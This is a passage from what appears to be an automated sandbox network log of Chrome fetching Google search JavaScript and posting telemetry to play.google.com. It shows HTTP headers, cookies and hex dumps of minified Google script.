                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1687OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=aLUfP?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                                          sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                                                          sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                                                          sec-ch-ua-model: ""
                                                                                                                                                                                                                                                                                          sec-ch-prefers-color-scheme: light
                                                                                                                                                                                                                                                                                          sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                          Referer: https://www.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 1521
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 06:23:18 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 06:23:18 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 29885
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC562INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 4c 55 66 50 22 29 3b 0a 76 61 72 20 44 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 53 70 3d 61 7d 3b 76 61 72 20 45 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 77 69 6e 64 6f 77 3d 61 2e 73 65 72 76 69 63 65 2e 77 69 6e 64 6f 77 2e 67 65 74 28 29 3b 74 68 69 73 2e 74 61 3d 74 68 69 73 2e 53 70 28 29 3b 74 68 69 73 2e 6f 61 3d 77 69 6e 64 6f 77 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3b 74 68 69 73 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{_.w("aLUfP");var Dqb=function(a){this.Sp=a};var Eqb=function(a){_.Bn.call(this,a.Ma);var b=this;this.window=a.service.window.get();this.ta=this.Sp();this.oa=window.orientation;this.ka=function(){va
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC959INData Raw: 69 73 2e 48 58 61 28 29 26 26 74 68 69 73 2e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 0a 74 68 69 73 2e 6b 61 29 7d 3b 5f 2e 43 28 45 71 62 2c 5f 2e 42 6e 29 3b 45 71 62 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 65 72 76 69 63 65 3a 7b 77 69 6e 64 6f 77 3a 5f 2e 45 6e 7d 7d 7d 3b 5f 2e 6d 3d 45 71 62 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 61 64 64 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 61 64 64 28 61 29 7d 3b 5f 2e 6d 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 64 65 6c 65 74 65 28 61 29 7d 3b 0a 5f 2e 6d 2e 53 70 3d 66 75
                                                                                                                                                                                                                                                                                          Data Ascii: is.HXa()&&this.window.addEventListener("orientationchange",this.ka)};_.C(Eqb,_.Bn);Eqb.Ga=function(){return{service:{window:_.En}}};_.m=Eqb.prototype;_.m.addListener=function(a){this.Nd.add(a)};_.m.removeListener=function(a){this.Nd.delete(a)};_.m.Sp=fu


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          57192.168.2.749818142.250.185.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1101OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 447
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Goog-AuthUser: 0
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ogs.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ogs.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC447OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 6f 6e 65 67 6f 6f 67 6c 65 68 74 74 70 73 65 72 76 65 72 5f 32 30 32 34 30 39 32 33 2e 30 30 5f 70 30 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 34 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 37 32 39 2c 5b 5b 22 31 37 32 37 34 34 38 30 37 39 38 36 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 5b 5b 5b 37 30 38 38 31 5d 2c 35 33 38 2c 5b 5d 5d 5d 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 34 34 30 30 2c 6e
                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_onegooglehttpserver_20240923.00_p0",null,null,[4,0,0,0,0]]],729,[["1727448079867",null,null,null,null,null,null,"[[[70881],538,[]]]",null,null,null,null,null,null,14400,n
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ogs.google.com
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          58192.168.2.749820142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1287OUTGET /xjs/_/js/k=xjs.hd.en.dIEp8Iy3TZo.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAIAgQAEAAACAAgAAAAAAAAAAAAAAAAAAAgQBAEQCAAACAOAAACAQAAABAAISAAABEoBHmQAAEQBMAAAAAAAQAAAIFAEAQAAAAAYAAAABAAAAAAAKAAAAAAAAAAAAAAAAAEAAgQAAAAAAAAAAAAAgAAAAAPQAAAAAAAAAgAAAAAECAANkAAIAAAAAAAD6ACB4AAwpLAAAAAAAAAAAAAAAEIAEwVxIQEEAAgAAAAAAAAAAAAAAACAlTVzY/d=0/dg=0/br=1/rs=ACT90oHQtgb1Vp7_2FMfyCLADlsBNbpGNA/m=sy1em,P10Owf,sy1de,sy1dc,syr0,gSZvdb,sy10q,sy10p,WlNQGd,syr5,syr2,syr1,syqz,DPreE,sy112,sy110,nabPbb,sy10k,sy10i,syjv,syo3,CnSW2d,kQvlef,sy111,fXO0xe?xjs=s4 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: AEC=AVYB7cpG1uBhioZlQAbG3rEAfSdzgk7zObM74vAXRuoASQnD8mXc1KCgWQY; OGPC=19037049-1:; NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="gws-team"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 24979
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 14:41:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 27 Sep 2024 04:59:45 GMT
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC573INData Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 4c 24 63 3d 5f 2e 45 64 28 22 50 31 30 4f 77 66 22 2c 5b 5f 2e 67 71 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 31 30 4f 77 66 22 29 3b 0a 76 61 72 20 47 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 69 73 2e 6b 61 3d 74 68 69 73 2e 67 65 74 44 61 74 61 28 22 63 6d 65 70 22 29 2e 4b 62 28 29 3b 74 68 69 73 2e 4f 62 3d 61 2e 73 65 72 76 69 63 65 2e 4f 62 3b 74 68 69 73 2e 64 61 74 61 3d 61 2e 54 64 2e 74 64 61 7d 3b 5f 2e 43 28
                                                                                                                                                                                                                                                                                          Data Ascii: this._hd=this._hd||{};(function(_){var window=this;try{_.L$c=_.Ed("P10Owf",[_.gq]);}catch(e){_._DumpException(e)}try{_.w("P10Owf");var GD=function(a){_.A.call(this,a.Ma);this.ka=this.getData("cmep").Kb();this.Ob=a.service.Ob;this.data=a.Td.tda};_.C(
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 30 3a 63 2e 4a 75 28 29 29 26 26 28 62 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 62 2e 4a 75 28 29 29 21 3d 3d 61 2e 64 61 74 61 2e 4a 75 28 29 7c 7c 61 2e 4f 62 2e 6b 61 28 29 2e 6f 61 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 32 29 2e 6c 6f 67 28 21 30 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 29 2e 6c 6f 67 28 21 30 29 3b 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 55 78 63 29 7d 3b 47 44 2e 70 72 6f 74 6f 74 79 70 65 2e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4f 62 2e 6b 61 28 29 2e 6b 61 28 61 2e 71 62 2e 65 6c 28 29 29 2e 6c 6f 67 28 21 30 29 3b 69 66
                                                                                                                                                                                                                                                                                          Data Ascii: .data)==null?0:c.Ju())&&(b==null?void 0:b.Ju())!==a.data.Ju()||a.Ob.ka().oa(a.getRoot().el(),2).log(!0)};GD.prototype.Ha=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);_.nf(document,_.Uxc)};GD.prototype.Ca=function(a){this.Ob.ka().ka(a.qb.el()).log(!0);if
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 7d 3b 0a 76 61 72 20 43 35 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 6b 75 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 29 3b 5f 2e 7a 35 63 28 22 66 73 22 29 3b 61 2e 6b 61 3f 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 52 78 63 2c 61 2e 64 61 74 61 2e 4c 63 28 29 29 3a 5f 2e 6e 66 28 64 6f 63 75 6d 65 6e 74 2c 5f 2e 51 78 63 2c 61 2e 64 61 74 61 29 3b 5f 2e 6e 66 28 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2c 5f 2e 4a 77 62 29 3b 5f 2e 77 77 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 2c 22 68 69 64 65 5f 70 6f 70 75 70 22 29 3b 61 2e 74 61 26 26 61 2e 74 72 69 67 67 65 72 28 5f 2e 79 35 63 29 7d 3b 5f 2e 4c 28 42 35 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 79 4d 31 59 4a 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                          Data Ascii: };var C5c=function(a){_.ku(a.getRoot().el());_.z5c("fs");a.ka?_.nf(document,_.Rxc,a.data.Lc()):_.nf(document,_.Qxc,a.data);_.nf(window.document.body,_.Jwb);_.ww(a.getRoot().el(),"hide_popup");a.ta&&a.trigger(_.y5c)};_.L(B5c.prototype,"yM1YJe",function(){
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 62 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 6d 2e 55 38 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6b 75 61 7d 3b 0a 5f 2e 6d 2e 69 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 65 66 69 78 3d 22 22 7d 3b 76 61 72 20 50 6e 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 43 50 28 29 3b 5f 2e 46 61 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 2e 6b 61 28 63 29 3b 69 66 28 64 2e 69 73 53 65 6c 65 63 74 65 64 28 29 26 26 64 2e 69 73 45 6e 61 62 6c 65 64 28 29 29 73 77 69 74 63 68 28 64 2e 67 65 74 54 79 70 65 28 29 29 7b 63 61 73 65 20 32 3a 51 6e 63 28 61 29 3b 64 2e 71 72 28 21 30 29 3b 61 2e 77 61 3d 63 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 3a 64
                                                                                                                                                                                                                                                                                          Data Ascii: b.push(c);return b};_.m.U8c=function(){return this.kua};_.m.iuc=function(){this.prefix=""};var Pnc=function(a){var b=a.CP();_.Fa(b,function(c){var d=a.ka(c);if(d.isSelected()&&d.isEnabled())switch(d.getType()){case 2:Qnc(a);d.qr(!0);a.wa=c;break;case 3:d
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 6f 74 79 70 65 3b 5f 2e 6d 2e 54 71 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 77 61 7d 3b 5f 2e 6d 2e 68 39 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 43 61 7d 3b 5f 2e 6d 2e 64 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 61 7d 3b 0a 5f 2e 6d 2e 4e 43 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 54 71 28 29 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 6b 61 28 61 29 2e 67 65 74 43 6f 6e 74 65 6e 74 28 29 3a 22 22 7d 3b 5f 2e 6d 2e 6b 4c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 43 50 28 29 5b 30 5d 3b 72 65 74 75 72 6e 20 61 3f 74 68 69 73 2e 4a 57 28 61 29 3a 6e 75 6c 6c 7d 3b 5f 2e 6d 2e 6c 4c 62 3d
                                                                                                                                                                                                                                                                                          Data Ascii: otype;_.m.Tq=function(){return this.wa};_.m.h9c=function(){return this.Ca};_.m.duc=function(){return this.oa};_.m.NCa=function(){var a=this.Tq();return a?this.ka(a).getContent():""};_.m.kLb=function(){var a=this.CP()[0];return a?this.JW(a):null};_.m.lLb=
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:23 UTC1390INData Raw: 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 61 3d 3d 3d 6e 75 6c 6c 26 26 52 6e 63 28 74 68 69 73 2c 74 68 69 73 2e 43 50 28 29 5b 30 5d 29 7d 3b 5f 2e 6d 2e 66 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4c 6e 63 29 7d 3b 5f 2e 6d 2e 67 75 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 4a 65 28 61 2c 5f 2e 4d 6e 63 29 3b 52 6e 63 28 74 68 69 73 2c 6e 75 6c 6c 29 7d 3b 5f 2e 6d 2e 68 75 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 61 3d 56 6e 63 28 61 29 29 26 26 52 6e 63 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 0a 5f 2e 6d 2e 57 6a 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72
                                                                                                                                                                                                                                                                                          Data Ascii: nction(){this.oa===null&&Rnc(this,this.CP()[0])};_.m.fuc=function(){var a=this.getRoot().el();_.Je(a,_.Lnc)};_.m.guc=function(){var a=this.getRoot().el();_.Je(a,_.Mnc);Rnc(this,null)};_.m.huc=function(a){(a=Vnc(a))&&Rnc(this,a,!0)};_.m.Wj=function(a){var
